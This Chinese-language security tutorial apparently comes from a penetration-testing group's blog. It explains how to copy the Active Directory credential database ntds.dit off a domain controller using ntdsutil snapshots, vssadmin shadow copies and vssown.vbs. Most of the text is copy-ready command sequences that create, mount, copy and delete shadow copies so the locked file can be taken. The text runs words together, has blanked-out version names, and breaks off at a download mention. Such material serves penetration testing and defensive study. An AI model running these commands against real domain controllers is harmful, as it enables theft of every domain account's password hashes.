STATEMENT
声明
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
介绍
Ntds.dit(也被称为ActiveDirectorydatabase),默认路径为:C:\Windows\NTDS,且只能通过域控制器进程和协议访问。
直接复制是无法复制出来的,会弹出提示框,提示文件已在EncryptingFileSystem(EFS)中打开
Ntdsutil工具提取方法
Ntdsutil介绍:
ntdsutil.exe是一个ActiveDirectory提供管理设施的命令行工具。可使用ntdsutil.exe执行ActiveDirectory的数据库维护,管理和控制单个主机操作,创建应用程序目录分区,以及删除由未使用ActiveDirectory安装向导(DCPromp.exe)成功降级的域控制器留下的元数据,该工具默认被安装在域控制器上,我们可以在域控制器上进行操作,也可以通过域内机器远程在域控制器上操作支持的操作系统:Server、Server、Server
创建快照:
ntdsutilsnapshot"activateinstancentds"createquitquit
查看快照是否创建成功:
ntdsutilsnapshot"ListAll"quitquit
挂载快照:
ntdsutilsnapshot"mount{GUID}"quitquit
拷贝快照:
copyC:\$SNAP__VOLUMEC$\windows\ntds\ntds.ditc:\windows\temp\ntds.dit
复制文件:这样子就可以把ntds文件复制出来了
卸载并删除快照:
ntdsutilsnapshot"unmount{GUID}""delete{GUID}"quitquit
vssadmin工具提取
vssadmin介绍:vssadmin1是WindowsServer及Windows7系统提供的VSS管理工具,它可以用于创建或删除卷影副本,列出卷影副本的信息(只能管理系统Provider创建的卷影副本)。还可以用于显示所有安装的所有卷影副本写入程序(writers)和提供程序(providers),以及改变卷影副本存储空间(即所谓的“diff空间”)的大小等。支持的操作系统:Server、Server创建快照:
vssadmincreateshadow/for=c:
复制文件:
copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.ditc:\ntds.dit
删除快照:
vssadmindeleteshadows/for=c:/quiet
vssown.vbs
vssown介绍:vssown.vbs和vssadmin类似,它是由TimTomes开发完成的,它可以创建和删除卷影副本,以及启动和停止卷影复制服务。下载